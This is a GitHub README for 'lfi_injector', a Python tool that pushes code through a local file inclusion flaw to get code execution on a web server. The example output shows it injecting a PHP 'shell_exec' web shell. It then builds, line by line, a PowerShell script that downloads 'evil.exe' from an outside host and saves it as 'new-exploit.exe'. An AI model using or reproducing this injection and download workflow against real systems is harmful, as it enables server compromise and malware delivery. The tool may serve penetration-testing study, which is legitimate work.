Skip to content

brokensound77/lfi_injector

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

lfi_injector

Reads code (or anything else) from a file, url encodes it, and makes a request for each line, so as to attempt to gain LFI code execution. Use of the inject parameter will precede the requests with the necessary php code (otherwise, this will need to be done manually)

Prerequisites: The system must be vulnerable to LFI and the appropriate susceptible URL must be used (do your research)

Usage

usage: lfi_injector.py [-h] -f FILE -u URL -p PARAMETER [-v] [--inject]
                       [--target TARGET] [--port PORT]

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  file with code to send
  -u URL, --url URL     full vulnerable url (minus injected parameter
  -p PARAMETER, --parameter PARAMETER
                        injected parameter (ex: cmd)
  -v, --verbose         v: increased detail; vv: even more detail
  --inject              inject php parse code
  --target TARGET       target to inject parser
  --port PORT           port to inject (default: 80)

Example

python .\lfi_injector.py -f testfile -u http://127.0.0.1:8997?name=shrek -p t3st -v --inject --target=127.0.0.1 --port=8997
[+] inject php parameter parser enabled
[+] connecting to 127.0.0.1 on port 8997
[+] injecting: <?php echo shell_exec($_GET['t3st']);?>
[+] url: http://127.0.0.1:8997?name=shrek, parameter: t3st
[+] code read from file: testfile
[+] sending requests...
[+] sending: http://127.0.0.1:8997?name=shrek&t3st=echo+%24storageDir+%3D+%24pwd+%3E+wget.ps1
[+] success!
[+] sending: http://127.0.0.1:8997?name=shrek&t3st=echo+%24webclient+%3D+New-Object+System.Net.WebClient+%3E%3Ewget.ps1
[+] success!
[+] sending: http://127.0.0.1:8997?name=shrek&t3st=echo+%24url+%3D+%22http%3A%2F%2F10.11.0.5%2Fevil.exe%22+%3E%3Ewget.ps1
[+] success!
[+] sending: http://127.0.0.1:8997?name=shrek&t3st=echo+%24file+%3D+%22new-exploit.exe%22+%3E%3Ewget.ps1
[+] success!
[+] sending: http://127.0.0.1:8997?name=shrek&t3st=echo+%24webclient.DownloadFile%28%24url%2C%24file%29+%3E%3Ewget.ps1
[+] success!
[+] 100% successful transfer!

TODO

Definitely still needs a little work, but wanted to give a placeholder for now...

About

Local File Inclusion

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages